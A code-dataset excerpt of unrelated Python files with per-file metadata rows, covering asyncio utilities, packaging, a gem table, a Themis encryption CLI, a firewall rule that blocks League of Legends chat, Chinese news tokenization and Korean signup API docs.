self.cms_to_exit: Sequence[AsyncContextManager[Any]] = tuple()
async def __aenter__(self) -> Tuple[Any, ...]:
futures = [create_task(cm.__aenter__(), f'AsyncContextGroup/{repr(cm)}') for cm in self.cms]
await asyncio.wait(futures)
# Exclude context managers whose __aenter__ failed or was cancelled, so that
# we don't attempt to exit them.
self.cms_to_exit = tuple(
cm for cm, future in zip(self.cms, futures)
if not future.cancelled() and not future.exception())
try:
return tuple(future.result() for future in futures)
except: # noqa: E722
await self._exit(*sys.exc_info())
raise
async def _exit(self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> None:
if not self.cms_to_exit:
return
# don't use gather() to ensure that we wait for all __aexit__s
# to complete even if one of them raises
done, _pending = await asyncio.wait(
[cm.__aexit__(exc_type, exc_value, traceback) for cm in self.cms_to_exit])
# This is to ensure we re-raise any exceptions our coroutines raise when exiting.
errors: List[Tuple[Type[BaseException], BaseException, TracebackType]] = []
for d in done:
try:
d.result()
except BaseException:
errors.append(sys.exc_info())
if errors:
raise MultiError(
tuple(exc_value.with_traceback(exc_tb) for _, exc_value, exc_tb in errors))
async def __aexit__(self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> None:
# Since the exits run in parallel, they can't see each other's
# exceptions, so forward the exception info from the `async with`
# body to all of them.
await self._exit(exc_type, exc_value, traceback)
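Editor's sketch: minimal usage with asynccontextmanager-based resources, assuming trinity's own dependencies (trio, p2p.asyncio_utils) are importable; the resource names are invented.

import asyncio
from contextlib import asynccontextmanager

@asynccontextmanager
async def resource(name):  # hypothetical context manager for illustration
    print('enter', name)
    try:
        yield name
    finally:
        print('exit', name)

async def main():
    async with AsyncContextGroup([resource('a'), resource('b')]) as (a, b):
        print('inside with', a, b)  # both were entered concurrently

asyncio.run(main())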
| 40.887097
| 100
| 0.613018
| 300
| 2,535
| 4.99
| 0.363333
| 0.032732
| 0.024048
| 0.034736
| 0.183033
| 0.132265
| 0.132265
| 0.132265
| 0.132265
| 0.132265
| 0
| 0.002269
| 0.304536
| 2,535
| 61
| 101
| 41.557377
| 0.846852
| 0.162919
| 0
| 0.222222
| 0
| 0
| 0.013258
| 0.013258
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0
| 0.133333
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
889d4cf4c9e065bcd8eb21c034baa0e27279103e
| 895
|
py
|
Python
|
setup.py
|
sophilabs/trybox-django
|
87776a75e995a903d08b06dc47ec54a7ce796400
|
[
"MIT"
] | null | null | null |
setup.py
|
sophilabs/trybox-django
|
87776a75e995a903d08b06dc47ec54a7ce796400
|
[
"MIT"
] | null | null | null |
setup.py
|
sophilabs/trybox-django
|
87776a75e995a903d08b06dc47ec54a7ce796400
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
VERSION = '0.2'
setup(
name='trybox-django',
version=VERSION,
description='TryBox:Django',
author='Sophilabs',
author_email='contact@sophilabs.com',
url='https://github.com/sophilabs/trybox-django',
download_url='http://github.com/sophilabs/trybox-django/tarball/trybox-django-v{0}#egg=trybox-django'.format(VERSION),
license='MIT',
install_requires=['django', 'trybox'],
dependency_links=['https://github.com/sophilabs/trybox/tarball/master#egg=trybox'],
packages=find_packages(),
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
],
)
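Editor's note: a hedged sketch of the typical local workflow for a setup.py like this; commands shown as comments, not part of the file.

# pip install -e .        # editable install for development
# python setup.py sdist   # build a source distribution
# Note: dependency_links is deprecated in modern pip; PEP 508 direct-URL
# requirements are the usual replacement.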
| 34.423077
| 122
| 0.660335
| 95
| 895
| 6.157895
| 0.568421
| 0.123077
| 0.092308
| 0.123077
| 0.160684
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005487
| 0.185475
| 895
| 26
| 123
| 34.423077
| 0.796982
| 0
| 0
| 0
| 0
| 0.041667
| 0.53125
| 0.023438
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041667
| 0
| 0.041667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
889e2666b623f8c9aac578a42112779d0960a46c
| 1,152
|
py
|
Python
|
bflib/tables/gemsandjewelry/gemtype.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | 3
|
2017-10-28T11:28:38.000Z
|
2018-09-12T09:47:00.000Z
|
bflib/tables/gemsandjewelry/gemtype.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
bflib/tables/gemsandjewelry/gemtype.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
from bflib.items import gems
class GemTypeRow(object):
__slots__ = ["min_percent", "max_percent", "gem_type"]
def __init__(self, min_percent, max_percent, gem_type):
self.min_percent = min_percent
self.max_percent = max_percent
self.gem_type = gem_type
class GemTypeTable(object):
rows = [
GemTypeRow(1, 10, gems.Greenstone),
GemTypeRow(11, 20, gems.Malachite),
GemTypeRow(21, 28, gems.Aventurine),
GemTypeRow(29, 38, gems.Phenalope),
GemTypeRow(39, 45, gems.Amethyst),
GemTypeRow(46, 54, gems.Fluorospar),
GemTypeRow(55, 60, gems.Garnet),
GemTypeRow(61, 65, gems.Alexandrite),
GemTypeRow(66, 70, gems.Topaz),
GemTypeRow(71, 75, gems.Bloodstone),
GemTypeRow(76, 79, gems.Sapphire),
GemTypeRow(80, 89, gems.Diamond),
GemTypeRow(90, 94, gems.FireOpal),
GemTypeRow(95, 97, gems.Ruby),
GemTypeRow(98, 100, gems.Emerald),
]
@classmethod
def get(cls, roll_value):
return next((row for row in cls.rows
if row.min_percent <= roll_value <= row.max_percent))
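Editor's sketch: a percentile roll resolved against the table above (relies on the module's own gems import).

row = GemTypeTable.get(83)
assert row.gem_type is gems.Diamond  # 83 falls in the 80-89 band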
| 32
| 74
| 0.623264
| 141
| 1,152
| 4.921986
| 0.531915
| 0.072046
| 0.073487
| 0.057637
| 0.07781
| 0.07781
| 0
| 0
| 0
| 0
| 0
| 0.070012
| 0.256076
| 1,152
| 35
| 75
| 32.914286
| 0.73979
| 0
| 0
| 0
| 0
| 0
| 0.026042
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.034483
| 0.034483
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88a1741eae3c2334f95c70dcecbe762feec732c9
| 1,964
|
py
|
Python
|
tools/python/smessage_encryption.py
|
radetsky/themis
|
18ea2e39a7258e23ca9a5bb642691a9431c63d0b
|
[
"Apache-2.0"
] | 1,561
|
2015-05-20T05:19:29.000Z
|
2022-03-31T17:32:55.000Z
|
tools/python/smessage_encryption.py
|
radetsky/themis
|
18ea2e39a7258e23ca9a5bb642691a9431c63d0b
|
[
"Apache-2.0"
] | 536
|
2015-05-20T13:57:08.000Z
|
2022-03-15T18:02:59.000Z
|
tools/python/smessage_encryption.py
|
radetsky/themis
|
18ea2e39a7258e23ca9a5bb642691a9431c63d0b
|
[
"Apache-2.0"
] | 141
|
2015-05-20T13:22:45.000Z
|
2022-03-29T01:29:40.000Z
|
#
# Copyright (c) 2017 Cossack Labs Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from base64 import b64encode, b64decode
from pythemis import smessage
_, COMMAND, SENDER_PRIVATE_KEY, RECIPIENT_PUBLIC_KEY, MESSAGE = range(5)
if len(sys.argv) != 5:
print('Usage: <command: enc | dec | sign | verify > <send_private_key> <recipient_public_key> <message>')
exit(1)
command = sys.argv[COMMAND]
private_key_path = sys.argv[SENDER_PRIVATE_KEY]
public_key_path = sys.argv[RECIPIENT_PUBLIC_KEY]
message = sys.argv[MESSAGE]
with open(private_key_path, 'rb') as f:
private_key = f.read()
with open(public_key_path, 'rb') as f:
public_key = f.read()
message_encrypter = smessage.SMessage(private_key, public_key)
if command == 'enc':
encrypted = message_encrypter.wrap(message.encode('utf-8'))
encoded = b64encode(encrypted)
print(encoded.decode('ascii'))
elif command == 'dec':
decoded = b64decode(message.encode('utf-8'))
decrypted = message_encrypter.unwrap(decoded)
print(decrypted.decode('utf-8'))
elif command == 'sign':
encrypted = smessage.ssign(private_key, message.encode('utf-8'))
encoded = b64encode(encrypted)
print(encoded.decode('ascii'))
elif command == 'verify':
decoded = b64decode(message.encode('utf-8'))
decrypted = smessage.sverify(public_key, decoded)
print(decrypted.decode('utf-8'))
else:
print('Wrong command, use <enc | dec | sign | verify>')
exit(1)
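Editor's sketch of a round-trip through the tool above, assuming pythemis is installed and the script is saved as smessage_encryption.py; the skeygen calls reflect pythemis' key-generation API as I understand it, so treat them as an assumption.

import subprocess
from pythemis.skeygen import GenerateKeyPair, KEY_PAIR_TYPE

# Generate one EC keypair and use it for both sender and recipient.
keypair = GenerateKeyPair(KEY_PAIR_TYPE.EC)
with open('priv.key', 'wb') as f:
    f.write(keypair.export_private_key())
with open('pub.key', 'wb') as f:
    f.write(keypair.export_public_key())

enc = subprocess.run(
    ['python', 'smessage_encryption.py', 'enc', 'priv.key', 'pub.key', 'hello'],
    capture_output=True, text=True).stdout.strip()
dec = subprocess.run(
    ['python', 'smessage_encryption.py', 'dec', 'priv.key', 'pub.key', enc],
    capture_output=True, text=True).stdout.strip()
assert dec == 'hello'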
| 33.288136
| 109
| 0.726578
| 277
| 1,964
| 5.043321
| 0.422383
| 0.057266
| 0.045812
| 0.048676
| 0.280601
| 0.263422
| 0.168933
| 0.108805
| 0.108805
| 0.108805
| 0
| 0.019289
| 0.155295
| 1,964
| 58
| 110
| 33.862069
| 0.822785
| 0.283605
| 0
| 0.285714
| 0
| 0.028571
| 0.145219
| 0.015816
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.085714
| 0
| 0.085714
| 0.171429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88a50848a3ac961cc89962bc6f936cbbfc7cd63c
| 819
|
py
|
Python
|
tests/apps/test_rpc.py
|
PyCN/pulsar
|
fee44e871954aa6ca36d00bb5a3739abfdb89b26
|
[
"BSD-3-Clause"
] | 1,410
|
2015-01-02T14:55:07.000Z
|
2022-03-28T17:22:06.000Z
|
tests/apps/test_rpc.py
|
PyCN/pulsar
|
fee44e871954aa6ca36d00bb5a3739abfdb89b26
|
[
"BSD-3-Clause"
] | 194
|
2015-01-22T06:18:24.000Z
|
2020-10-20T21:21:58.000Z
|
tests/apps/test_rpc.py
|
PyCN/pulsar
|
fee44e871954aa6ca36d00bb5a3739abfdb89b26
|
[
"BSD-3-Clause"
] | 168
|
2015-01-31T10:29:55.000Z
|
2022-03-14T10:22:24.000Z
|
'''Tests the rpc middleware and utilities. It uses the calculator example.'''
import unittest
from pulsar.apps import rpc
from pulsar.apps.http import HttpWsgiClient
class rpcTest(unittest.TestCase):
def proxy(self):
from examples.calculator.manage import Site
http = HttpWsgiClient(Site())
return rpc.JsonProxy('http://127.0.0.1:8060/', http=http, timeout=20)
def test_proxy(self):
p = self.proxy()
http = p.http
self.assertTrue(len(http.headers))
self.assertEqual(http.headers['user-agent'], 'Pulsar-Http-Wsgi-Client')
self.assertTrue(http.wsgi_callable)
self.assertEqual(p._version, '2.0')
async def test_addition(self):
p = self.proxy()
response = await p.calc.add(4, 5)
self.assertEqual(response, 9)
| 30.333333
| 79
| 0.660562
| 108
| 819
| 4.972222
| 0.518519
| 0.083799
| 0.052142
| 0.052142
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02648
| 0.216117
| 819
| 26
| 80
| 31.5
| 0.809969
| 0.086691
| 0
| 0.105263
| 0
| 0
| 0.078167
| 0.030997
| 0
| 0
| 0
| 0
| 0.263158
| 1
| 0.105263
| false
| 0
| 0.210526
| 0
| 0.421053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88a9377893db4fc2f5048d2336cea72ff934579e
| 888
|
py
|
Python
|
code/animation/sine-cosine.py
|
geo7/scientific-visualization-book
|
71f6bac4db7ee2f26e88052fe7faa800303d8b00
|
[
"BSD-2-Clause"
] | 2
|
2021-11-17T15:10:09.000Z
|
2021-12-24T13:31:10.000Z
|
code/animation/sine-cosine.py
|
WuShichao/scientific-visualization-book
|
389766215aa6b234ed1cf560a3768437d41d1d37
|
[
"BSD-2-Clause"
] | 1
|
2021-12-12T11:37:48.000Z
|
2021-12-12T11:39:00.000Z
|
code/animation/sine-cosine.py
|
WuShichao/scientific-visualization-book
|
389766215aa6b234ed1cf560a3768437d41d1d37
|
[
"BSD-2-Clause"
] | 2
|
2021-12-30T12:20:07.000Z
|
2022-02-24T06:36:41.000Z
|
# ----------------------------------------------------------------------------
# Title: Scientific Visualisation - Python & Matplotlib
# Author: Nicolas P. Rougier
# License: BSD
# ----------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
fig = plt.figure(figsize=(7, 2))
ax = plt.subplot()
X = np.linspace(-np.pi, np.pi, 256, endpoint=True)
C, S = np.cos(X), np.sin(X)
(line1,) = ax.plot(X, C, marker="o", markevery=[-1], markeredgecolor="white")
(line2,) = ax.plot(X, S, marker="o", markevery=[-1], markeredgecolor="white")
def update(frame):
line1.set_data(X[:frame], C[:frame])
line2.set_data(X[:frame], S[:frame])
plt.tight_layout()
ani = animation.FuncAnimation(fig, update, interval=10)
plt.savefig("../../figures/animation/sine-cosine.pdf")
plt.show()
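Editor's sketch: a variant of the FuncAnimation call above that also persists the animation; assumes an ffmpeg binary is on PATH, and bounds the sweep with frames.

ani = animation.FuncAnimation(fig, update, frames=len(X), interval=10)
ani.save("../../figures/animation/sine-cosine.mp4", writer="ffmpeg", fps=30)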
| 31.714286
| 78
| 0.566441
| 110
| 888
| 4.545455
| 0.554545
| 0.064
| 0.028
| 0.068
| 0.148
| 0.148
| 0
| 0
| 0
| 0
| 0
| 0.016393
| 0.106982
| 888
| 27
| 79
| 32.888889
| 0.614124
| 0.281532
| 0
| 0
| 0
| 0
| 0.080696
| 0.061709
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.1875
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88ab2de7a369fd311ec763905e71a9bc7d4f2e49
| 2,773
|
py
|
Python
|
main.py
|
ghostcodekc/leagueoflegends-block-chat
|
0d68345964344410159d834cba81da4224196f87
|
[
"MIT"
] | null | null | null |
main.py
|
ghostcodekc/leagueoflegends-block-chat
|
0d68345964344410159d834cba81da4224196f87
|
[
"MIT"
] | null | null | null |
main.py
|
ghostcodekc/leagueoflegends-block-chat
|
0d68345964344410159d834cba81da4224196f87
|
[
"MIT"
] | null | null | null |
import yaml
import socket
import subprocess, ctypes, os, sys
from subprocess import Popen, DEVNULL
def read_yaml(file_path):
with open(file_path, "r") as f:
return yaml.safe_load(f)
def check_admin():
""" Force to start application with admin rights """
try:
isAdmin = ctypes.windll.shell32.IsUserAnAdmin()
except AttributeError:
isAdmin = False
if not isAdmin:
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)
sys.exit(0)  # hand over to the elevated relaunch instead of continuing unelevated
def check_for_firewall_rule(firewall_rule_name):
""" Check for existing rule in Windows Firewall """
print("Checking to see if firewall rule exists")
x = subprocess.call(
f"netsh advfirewall firewall show rule {firewall_rule_name}",
shell=True,
stdout=DEVNULL,
stderr=DEVNULL
)
if x == 0:
print("Rule exists.")
return True
else:
print("Rule does not exist.")
return False
def add_or_modify_rule(firewall_rule_name, state, firewall_exists, ip):
""" Add Rule if the rule doesn't already exist. Delete the rule if the rule exists. """
if firewall_exists and state == 1:
delete_rule(firewall_rule_name)
add_rule(firewall_rule_name, ip)
if firewall_exists and state == 0:
delete_rule(firewall_rule_name)
if not firewall_exists and state == 1:
add_rule(firewall_rule_name, ip)
if not firewall_exists and state == 0:
print("Firewall rule does not exist, and `block chat` is set to disabled")
def delete_rule(firewall_rule_name):
subprocess.call(
f"netsh advfirewall firewall delete rule name={firewall_rule_name}",
shell=True,
stdout=DEVNULL,
stderr=DEVNULL
)
print(f"Rule '{firewall_rule_name}' deleted")
def add_rule(firewall_rule_name, ip):
""" Add rule to Windows Firewall """
subprocess.call(
f"netsh advfirewall firewall add rule name={firewall_rule_name} dir=out action=block remoteip={ip} protocol=TCP",
shell=True,
stdout=DEVNULL,
stderr=DEVNULL
)
print(f"Current League of Legends Chat IP Address: {ip}. \nRule {firewall_rule_name} added. ")
if __name__ == '__main__':
config = read_yaml("./config.yaml")  # forward slash avoids the invalid "\c" escape
state = config['config']['block_chat']
firewall_rule_name = config['config']['firewall_rule_name']
lol_config_file = config['config']['dir']
region = config['config']['region']
lol_config = read_yaml(lol_config_file)
host = lol_config['region_data'][region]['servers']['chat']['chat_host']
ip = socket.gethostbyname(host)
check_admin()
firewall_exists = check_for_firewall_rule(firewall_rule_name)
add_or_modify_rule(firewall_rule_name, state, firewall_exists, ip)
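Editor's note: the config.yaml shape this script expects, inferred from the keys it reads; every value below is illustrative.

# config:
#   block_chat: 1                        # 1 = add the block rule, 0 = remove it
#   firewall_rule_name: LoLBlockChat
#   dir: C:/Riot Games/League of Legends/system.yaml
#   region: NA
# The file at `dir` must expose region_data.<region>.servers.chat.chat_host,
# which is resolved to the IP that the firewall rule blocks.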
| 36.012987
| 121
| 0.679769
| 371
| 2,773
| 4.843666
| 0.285714
| 0.140234
| 0.151363
| 0.133556
| 0.407902
| 0.318865
| 0.210907
| 0.14079
| 0.114636
| 0.057874
| 0
| 0.004608
| 0.217454
| 2,773
| 77
| 122
| 36.012987
| 0.823502
| 0.072124
| 0
| 0.227273
| 0
| 0.015152
| 0.237049
| 0.028257
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.060606
| 0
| 0.19697
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88ac260681c50b787cb8306fb30da9bc778c277f
| 5,623
|
py
|
Python
|
src/Leorio/tokenization.py
|
majiajue/Listed-company-news-crawl-and-text-analysis
|
fd3b23814039cbe8fbb2e25cbadb68238e0d998b
|
[
"MIT"
] | 635
|
2018-02-25T08:45:06.000Z
|
2022-03-30T10:05:23.000Z
|
src/Leorio/tokenization.py
|
NongMaYiSheng/Listed-company-news-crawl-and-text-analysis
|
fd3b23814039cbe8fbb2e25cbadb68238e0d998b
|
[
"MIT"
] | 5
|
2018-10-29T16:21:28.000Z
|
2022-01-03T12:59:28.000Z
|
src/Leorio/tokenization.py
|
NongMaYiSheng/Listed-company-news-crawl-and-text-analysis
|
fd3b23814039cbe8fbb2e25cbadb68238e0d998b
|
[
"MIT"
] | 216
|
2018-02-26T09:27:15.000Z
|
2022-03-30T10:05:26.000Z
|
import __init__
from Kite.database import Database
from Kite import config
from Kite import utils
import jieba
import pkuseg
import logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S')
class Tokenization(object):
def __init__(self, import_module="jieba", user_dict=None, chn_stop_words_dir=None):
#self.database = Database().conn[config.DATABASE_NAME] #.get_collection(config.COLLECTION_NAME_CNSTOCK)
self.database = Database()
self.import_module = import_module
self.user_dict = user_dict
if self.user_dict:
self.update_user_dict(self.user_dict)
if chn_stop_words_dir:
self.stop_words_list = utils.get_chn_stop_words(chn_stop_words_dir)
else:
self.stop_words_list = list()
def update_user_dict(self, old_user_dict_dir, new_user_dict_dir=None):
# Add missing (or new) stock names, financial neologisms, etc. to the financial user dictionary
word_list = []
with open(old_user_dict_dir, "r", encoding="utf-8") as file:
for row in file:
word_list.append(row.split("\n")[0])
name_code_df = self.database.get_data(config.STOCK_DATABASE_NAME,
config.COLLECTION_NAME_STOCK_BASIC_INFO,
keys=["name", "code"])
new_words_list = list(set(name_code_df["name"].tolist()))
for word in new_words_list:
if word not in word_list:
word_list.append(word)
new_user_dict_dir = old_user_dict_dir if not new_user_dict_dir else new_user_dict_dir
with open(new_user_dict_dir, "w", encoding="utf-8") as file:
for word in word_list:
file.write(word + "\n")
def cut_words(self, text):
outstr = list()
sentence_seged = None
if self.import_module == "jieba":
if self.user_dict:
jieba.load_userdict(self.user_dict)
sentence_seged = list(jieba.cut(text))
elif self.import_module == "pkuseg":
seg = pkuseg.pkuseg(user_dict=self.user_dict) # load the user-defined dictionary
sentence_seged = seg.cut(text) # perform word segmentation
if sentence_seged:
for word in sentence_seged:
if word not in self.stop_words_list \
and word != "\t" \
and word != " " \
and utils.is_contain_chn(word)\
and len(word) > 1:
outstr.append(word)
return outstr
else:
return False
def find_relevant_stock_codes_in_article(self, article, stock_name_code_dict):
stock_codes_set = list()
cut_words_list = self.cut_words(article)
if cut_words_list:
for word in cut_words_list:
try:
stock_codes_set.append(stock_name_code_dict[word])
except Exception:
pass
return list(set(stock_codes_set))
def update_news_database_rows(self,
database_name,
collection_name,
incremental_column_name="RelatedStockCodes"):
name_code_df = self.database.get_data(config.STOCK_DATABASE_NAME,
config.COLLECTION_NAME_STOCK_BASIC_INFO,
keys=["name", "code"])
name_code_dict = dict(name_code_df.values)
data = self.database.get_collection(database_name, collection_name).find()
for row in data:
# if row["Date"] > "2019-05-20 00:00:00":
# Newly inserted rows do not yet have the update column, while old rows already do,
# so check whether the row contains the incremental_column_name field
if incremental_column_name not in row.keys():
related_stock_codes_list = self.find_relevant_stock_codes_in_article(
row["Article"], name_code_dict)
self.database.update_row(database_name,
collection_name,
{"_id": row["_id"]},
{incremental_column_name: " ".join(related_stock_codes_list)}
)
logging.info("[{} -> {} -> {}] updated {} key value ... "
.format(database_name, collection_name, row["Date"], incremental_column_name))
else:
logging.info("[{} -> {} -> {}] has already existed {} key value ... "
.format(database_name, collection_name, row["Date"], incremental_column_name))
if __name__ == "__main__":
tokenization = Tokenization(import_module="jieba",
user_dict="financedict.txt",
chn_stop_words_dir="chnstopwords.txt")
# documents_list = \
# [
# "中央、地方支持政策频出,煤炭行业站上了风口 券商研报浩如烟海,投资线索眼花缭乱,\
# 第一财经推出《一财研选》产品,挖掘研报精华,每期梳理5条投资线索,便于您短时间内获\
# 取有价值的信息。专业团队每周日至每周四晚8点准时“上新”,助您投资顺利!",
# "郭文仓到重点工程项目督导检查 2月2日,公司党委书记、董事长、总经理郭文仓,公司董事,\
# 股份公司副总经理、总工程师、郭毅民,股份公司副总经理张国富、柴高贵及相关单位负责人到\
# 焦化厂煤场全封闭和干熄焦等重点工程项目建设工地督导检查施工进度和安全工作情况。"
# ]
# for text in documents_list:
# cut_words_list = tokenization.cut_words(text)
# print(cut_words_list)
# tokenization.update_news_database_rows(config.DATABASE_NAME, "jrj")
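Editor's sketch: the matching idea behind find_relevant_stock_codes_in_article without the database dependency; the name-to-code mapping is hypothetical, and add_word mirrors what the user dictionary guarantees above.

import jieba

stock_name_code = {'贵州茅台': '600519', '宁德时代': '300750'}  # hypothetical mapping
for name in stock_name_code:
    jieba.add_word(name)  # keep each stock name as a single token
article = '贵州茅台与宁德时代今日双双上涨。'
codes = {stock_name_code[w] for w in jieba.cut(article) if w in stock_name_code}
print(codes)  # {'600519', '300750'}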
| 44.626984
| 112
| 0.560377
| 617
| 5,623
| 4.776337
| 0.277147
| 0.054293
| 0.029861
| 0.023753
| 0.178487
| 0.147947
| 0.112657
| 0.112657
| 0.112657
| 0.112657
| 0
| 0.005982
| 0.345901
| 5,623
| 125
| 113
| 44.984
| 0.795269
| 0.135515
| 0
| 0.157895
| 0
| 0.010526
| 0.066529
| 0.005992
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0.010526
| 0.126316
| 0
| 0.221053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88ade7f8dfd3c3fdb9f4bfa3e09536d509c88764
| 2,659
|
py
|
Python
|
Server/app/docs/signup.py
|
Sporrow/Sporrow-Backend
|
a711f8a25c0b6fdbbeff0a980fbf39a470020e23
|
[
"Apache-2.0"
] | null | null | null |
Server/app/docs/signup.py
|
Sporrow/Sporrow-Backend
|
a711f8a25c0b6fdbbeff0a980fbf39a470020e23
|
[
"Apache-2.0"
] | null | null | null |
Server/app/docs/signup.py
|
Sporrow/Sporrow-Backend
|
a711f8a25c0b6fdbbeff0a980fbf39a470020e23
|
[
"Apache-2.0"
] | null | null | null |
from app.docs import SAMPLE_OBJECT_IDS
ID_DUPLICATION_CHECK_GET = {
'tags': ['회원가입'],
'description': '이메일이 이미 가입되었는지를 체크(중복체크)합니다.',
'parameters': [
{
'name': 'email',
'description': '중복을 체크할 이메일',
'in': 'path',
'type': 'str',
'required': True
}
],
'responses': {
'200': {
'description': '중복되지 않음',
},
'409': {
'description': '중복됨'
}
}
}
SIGNUP_POST = {
'tags': ['회원가입'],
'description': '회원가입합니다.',
'parameters': [
{
'name': 'email',
'description': '이메일',
'in': 'json',
'type': 'str',
'required': True
},
{
'name': 'pw',
'description': '비밀번호',
'in': 'json',
'type': 'str',
'required': True
}
],
'responses': {
'201': {
'description': '회원가입 성공, 인증 이메일 발송 완료. 기본 정보 초기화 액티비티로 이동하면 됩니다. 인증 이메일의 유효 시간은 5분입니다.',
},
'409': {
'description': '이메일 중복됨'
}
}
}
EMAIL_RESEND_GET = {
'tags': ['회원가입'],
'description': '인증 메일을 재전송합니다.',
'parameters': [
{
'name': 'email',
'description': '인증 메일을 재전송할 이메일',
'in': 'path',
'type': 'str',
'required': True
}
],
'responses': {
'200': {
'description': '이메일 재전송 성공',
},
'204': {
'description': '가입되지 않은 이메일'
}
}
}
INITIALIZE_INFO_POST = {
'tags': ['회원가입'],
'description': '기본 정보를 업로드합니다.',
'parameters': [
{
'name': 'email',
'description': '기본 정보 업로드 대상 이메일',
'in': 'path',
'type': 'str',
'required': True
},
{
'name': 'nickname',
'description': '닉네임',
'in': 'json',
'type': 'str',
'required': True
},
{
'name': 'categories',
'description': '관심사 ID 목록 ex) ["{}"], ["{}"], ["{}"]'.format(*SAMPLE_OBJECT_IDS),
'in': 'json',
'type': 'list',
'required': True
}
],
'responses': {
'201': {
'description': '업로드 성공',
},
'204': {
'description': '가입되지 않은 이메일'
},
'400': {
'description': '관심사 ID 중 존재하지 않는 관심사가 존재함'
},
'401': {
'description': '이메일 인증되지 않음'
},
'409': {
'description': '닉네임이 중복됨'
}
}
}
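Editor's sketch: these dicts have the shape of Flasgger view specs; hypothetical wiring for one of them, assuming the project feeds them to Flasgger (an assumption, not confirmed by the file).

from flasgger import Swagger, swag_from
from flask import Flask

app = Flask(__name__)
Swagger(app)

@app.route('/signup', methods=['POST'])
@swag_from(SIGNUP_POST)  # attach the spec dict above to the view
def signup():
    return '', 201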
| 22.158333
| 100
| 0.371944
| 205
| 2,659
| 4.765854
| 0.439024
| 0.085977
| 0.092119
| 0.116684
| 0.332651
| 0.269191
| 0.192426
| 0.104401
| 0.104401
| 0.104401
| 0
| 0.023224
